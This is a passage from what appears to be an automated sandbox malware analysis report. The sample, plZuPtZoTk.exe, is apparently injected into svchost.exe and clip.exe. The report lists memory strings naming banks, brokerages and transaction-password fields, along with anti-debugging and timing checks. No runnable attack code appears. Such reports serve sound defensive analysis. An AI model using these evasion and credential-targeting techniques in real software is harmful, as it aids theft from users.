            Source: 5-19-2H.5.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: 5-19-2H.5.dr Binary or memory string: dev.azure.comVMware20,11696494690j
            Source: clip.exe, 00000005.00000002.3286208729.000000000760B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pageVMware20,11696494690
            Source: 5-19-2H.5.dr Binary or memory string: global block list test formVMware20,11696494690
            Source: clip.exe, 00000005.00000002.3286208729.000000000760B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,1m6$
            Source: clip.exe, 00000005.00000002.3286208729.000000000760B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: blocklistVMware20,11696494690
            Source: 5-19-2H.5.dr Binary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: 5-19-2H.5.dr Binary or memory string: bankofamerica.comVMware20,11696494690x
            Source: 5-19-2H.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: 5-19-2H.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: 5-19-2H.5.dr Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: clip.exe, 00000005.00000002.3286208729.000000000760B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pageVMware20,11696494690*7i
            Source: 5-19-2H.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: 5-19-2H.5.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: 5-19-2H.5.dr Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\clip.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B7096E rdtsc 2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004172D3 LdrLoadDll, 2_2_004172D3
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe Code function: 0_2_00A3EAA2 BlockInput, 0_2_00A3EAA2
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe Code function: 0_2_009F2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_009F2622
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe Code function: 0_2_009C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_009C42DE
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe Code function: 0_2_009E4CE8 mov eax, dword ptr fs:[00000030h] 0_2_009E4CE8
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe Code function: 0_2_016E3068 mov eax, dword ptr fs:[00000030h] 0_2_016E3068
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe Code function: 0_2_016E30C8 mov eax, dword ptr fs:[00000030h] 0_2_016E30C8
            Source: C:\Users\user\Desktop\plZuPtZoTk.exe Code function: 0_2_016E19F8 mov eax, dword ptr fs:[00000030h] 0_2_016E19F8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h] 2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h] 2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h] 2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h] 2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h] 2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h] 2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h] 2_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h] 2_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B663FF mov eax, dword ptr fs:[00000030h] 2_2_03B663FF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] 2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] 2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] 2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] 2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] 2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] 2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] 2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] 2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h] 2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h] 2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BDE3DB mov ecx, dword ptr fs:[00000030h] 2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h] 2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h] 2_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h] 2_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BEC3CD mov eax, dword ptr fs:[00000030h] 2_2_03BEC3CD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h] 2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h] 2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h] 2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h] 2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB63C0 mov eax, dword ptr fs:[00000030h] 2_2_03BB63C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C0634F mov eax, dword ptr fs:[00000030h] 2_2_03C0634F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B2C310 mov ecx, dword ptr fs:[00000030h] 2_2_03B2C310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B50310 mov ecx, dword ptr fs:[00000030h] 2_2_03B50310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h] 2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h] 2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h] 2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BD437C mov eax, dword ptr fs:[00000030h] 2_2_03BD437C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h] 2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C08324 mov ecx, dword ptr fs:[00000030h] 2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h] 2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h] 2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h] 2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h] 2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h] 2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB035C mov ecx, dword ptr fs:[00000030h] 2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h] 2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h] 2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BFA352 mov eax, dword ptr fs:[00000030h] 2_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BD8350 mov ecx, dword ptr fs:[00000030h] 2_2_03BD8350
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h] 2_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h] 2_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C062D6 mov eax, dword ptr fs:[00000030h] 2_2_03C062D6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BC62A0 mov ecx, dword ptr fs:[00000030h] 2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h] 2_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h] 2_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h] 2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h] 2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h] 2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h] 2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h] 2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h]2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2823B mov eax, dword ptr fs:[00000030h]2_2_03B2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0625D mov eax, dword ptr fs:[00000030h]2_2_03C0625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h]2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h]2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2826B mov eax, dword ptr fs:[00000030h]2_2_03B2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A250 mov eax, dword ptr fs:[00000030h]2_2_03B2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36259 mov eax, dword ptr fs:[00000030h]2_2_03B36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]2_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h]2_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB8243 mov eax, dword ptr fs:[00000030h]2_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB8243 mov ecx, dword ptr fs:[00000030h]2_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h]2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h]2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C061E5 mov eax, dword ptr fs:[00000030h]2_2_03C061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B70185 mov eax, dword ptr fs:[00000030h]2_2_03B70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]2_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h]2_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]2_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h]2_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B601F8 mov eax, dword ptr fs:[00000030h]2_2_03B601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60124 mov eax, dword ptr fs:[00000030h]2_2_03B60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h]2_2_03C04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h]2_2_03C04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov ecx, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF0115 mov eax, dword ptr fs:[00000030h]2_2_03BF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C156 mov eax, dword ptr fs:[00000030h]2_2_03B2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC8158 mov eax, dword ptr fs:[00000030h]2_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov ecx, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov eax, dword ptr fs:[00000030h]2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B280A0 mov eax, dword ptr fs:[00000030h]2_2_03B280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC80A8 mov eax, dword ptr fs:[00000030h]2_2_03BC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3208A mov eax, dword ptr fs:[00000030h]2_2_03B3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03B2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B720F0 mov ecx, dword ptr fs:[00000030h]2_2_03B720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03B2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B380E9 mov eax, dword ptr fs:[00000030h]2_2_03B380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB60E0 mov eax, dword ptr fs:[00000030h]2_2_03BB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB20DE mov eax, dword ptr fs:[00000030h]2_2_03BB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6030 mov eax, dword ptr fs:[00000030h]2_2_03BC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A020 mov eax, dword ptr fs:[00000030h]2_2_03B2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C020 mov eax, dword ptr fs:[00000030h]2_2_03B2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4E016 mov eax, dword ptr fs:[00000030h]2_2_03B4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4000 mov ecx, dword ptr fs:[00000030h]2_2_03BB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2000 mov eax, dword ptr fs:[00000030h]2_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5C073 mov eax, dword ptr fs:[00000030h]2_2_03B5C073
